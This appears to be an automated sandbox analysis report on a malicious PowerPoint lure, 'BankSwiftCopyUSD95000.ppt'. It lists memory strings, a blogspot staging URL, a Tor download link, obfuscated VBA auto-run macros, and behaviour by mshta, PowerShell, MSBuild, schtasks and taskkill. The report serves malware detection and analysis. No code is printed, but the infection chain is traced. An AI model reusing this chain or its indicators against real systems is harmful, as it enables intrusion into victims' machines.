Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/unvisited-link-
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.jsZ
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.jsal
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/s
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/CO
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/css/maia.cssM
Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/css/maia.cssg
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 443

Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large array initializations

Source: 29.2.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE0F986DBu002d41FAu002d48F8u002d8F63u002d63B8796C3D6Fu007d/u0030691DBC7u002d6A15u002d4BCCu002dB997u002d853341EE6FA4.cs

Large array initialization: .cctor: array initializer size 12059

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function nQedtxArQgZ, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function PvrrqugmtK, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function aaBJQySxVnzo, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function hHvsmECZuS, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function hHvsmECZuS, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function hHvsmECZuS, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FB2EE NtQuerySystemInformation,	12_2_003FB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FB2CC NtQuerySystemInformation,	12_2_003FB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9B2EE NtQuerySystemInformation,	24_2_01D9B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9B2CC NtQuerySystemInformation,	24_2_01D9B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEB2EE NtQuerySystemInformation,	33_2_01CEB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEB2CC NtQuerySystemInformation,	33_2_01CEB2CC

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A518A8	12_2_02A518A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A574B7	12_2_02A574B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A51897	12_2_02A51897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A574C8	12_2_02A574C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A5618D	12_2_02A5618D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A51538	12_2_02A51538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A51548	12_2_02A51548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02871897	24_2_02871897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_028718A8	24_2_028718A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_028774B7	24_2_028774B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_028774C8	24_2_028774C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02871538	24_2_02871538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02871548	24_2_02871548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 29_2_001E6020	29_2_001E6020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 29_2_001E5408	29_2_001E5408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 29_2_001E5750	29_2_001E5750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A018A8	33_2_02A018A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A074B7	33_2_02A074B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A01897	33_2_02A01897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A074C8	33_2_02A074C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A0618D	33_2_02A0618D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A01538	33_2_02A01538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A01548	33_2_02A01548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02AE1BE2	33_2_02AE1BE2

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: BankSwiftCopyUSD95000.ppt	OLE, VBA macro line: Sub Auto_Close()
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Auto_Close			Name: Auto_Close

Document contains embedded VBA macros

Source: BankSwiftCopyUSD95000.ppt

OLE indicator, VBA macros: true

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: BankSwiftCopyUSD95000.ppt

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winPPT@46/51@29/5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FACEE AdjustTokenPrivileges,	12_2_003FACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FACB7 AdjustTokenPrivileges,	12_2_003FACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9ACEE AdjustTokenPrivileges,	24_2_01D9ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9ACB7 AdjustTokenPrivileges,	24_2_01D9ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEACEE AdjustTokenPrivileges,	33_2_01CEACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEACB7 AdjustTokenPrivileges,	33_2_01CEACB7

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC735.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................x.x...............x...............x.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................x.x.............................X.'.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................x.x...............x.......................x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................6.......................x.x.............................X.'.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................?.......................x.x...............x.......................x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................S.......................x.x.....#.......................X.'.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................\.......................x.x.....#.........x.......................x.....	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Console Write: .................................................v-.............................................................................................	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Console Write: ................................................d1......................L...............d...............................X.......B.........3.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................l.......T.......................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......v.......................................................x...............
